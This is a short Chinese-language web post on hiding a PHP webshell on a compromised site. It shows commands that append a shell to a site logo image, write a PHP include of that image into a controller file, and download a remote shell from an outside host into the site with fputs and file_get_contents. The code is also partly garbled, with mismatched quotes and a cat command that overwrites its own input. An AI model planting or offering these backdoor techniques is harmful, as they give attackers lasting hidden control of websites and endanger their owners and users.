1. 程式人生 > >php隱藏WEBSHELL技巧

php隱藏WEBSHELL技巧

web color div html get pos erp order nts

把shell添加到網站logo圖片裏:

cat logo.png shell.php > logo.png

在網站任意一個php文件裏添加下面的最簡單方法:

fputs(fopen(/home/www/html/orderpost/Ordernk/Home/Controller/EncryptController.classs.php,w),<?php include "upload/logo.png";?>));

還可以下載遠程的shell:

fputs(fopen(‘/home/www/html/orderpost/Ordernk/Home/Controller/EncryptController.classs.php‘,‘w‘),file_get_contents
(‘http://www.0668sec.info/utf8.txt‘));

php隱藏WEBSHELL技巧